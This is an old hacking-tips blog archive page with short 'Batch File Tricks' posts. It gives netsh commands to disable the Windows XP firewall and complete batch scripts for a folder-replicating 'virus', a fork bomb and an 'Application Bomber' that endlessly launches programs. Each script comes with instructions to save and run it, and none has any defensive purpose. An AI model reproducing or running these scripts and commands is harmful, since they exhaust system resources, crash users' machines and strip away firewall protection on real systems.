Raj Chandel's Blog
Archive for June, 2010
Enabling/Disabling the firewall using command line
02 years ago
Disable Windows XP firewall
netsh firewall set opmode disable
Enable the Windows XP firewall
netsh firewall set opmode enable
Folder Replicator Virus
02 years ago
by Raj Chandel
in Batch File Tricks
open notepad & type
:loop
md Virus
cd Virus
goto loop
save as raj.bat
Fork Bombing
02 years ago
by Raj Chandel
in Batch File Tricks
open notepad & type
@echo off
:loop
Explorer
Call fork.bat
Goto loop
save as hackingarticles.bat
Application Bomber
02 years ago
by Raj Chandel
in Batch File Tricks
open notepad & type
@echo off
:loop
start notepad
start compmgmt.msc
start mspaint
start osk
start cmd
start explorer
start control
start calc
goto loop
save as raj.bat